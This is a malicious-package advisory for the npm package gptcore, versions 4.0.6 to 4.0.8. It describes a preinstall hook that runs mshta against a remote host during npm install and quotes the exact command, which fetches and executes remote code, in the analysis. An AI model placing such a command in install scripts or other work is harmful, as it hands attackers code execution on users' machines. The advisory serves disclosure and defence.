npm · Malicious package advisory
Malwaregptcore
MAL-2026-10204
Malicious code in gptcore (npm)
Details
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (c36c51510f3762d03ab5bd7132de4a65a950f410cb5771a99d4fdc9334a9c895)
gptcore@4.0.7 declares a preinstall lifecycle script that runs `exec('cmd /c "mshta http://fixars.top"')` in preinstall.js. On Windows, this fires automatically during `npm install` and launches mshta.exe against the remote URL http://fixars.top, causing whatever HTA/JScript content that host currently serves to execute on the installer's machine. The destination is a hardcoded third-party host over plain HTTP, with no pinning, hash verification, or relationship to a legitimate publisher, and the fetched content is unrelated to any documented package purpose.
Compromised versions (3)
- 4.0.6
- 4.0.7
- 4.0.8
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.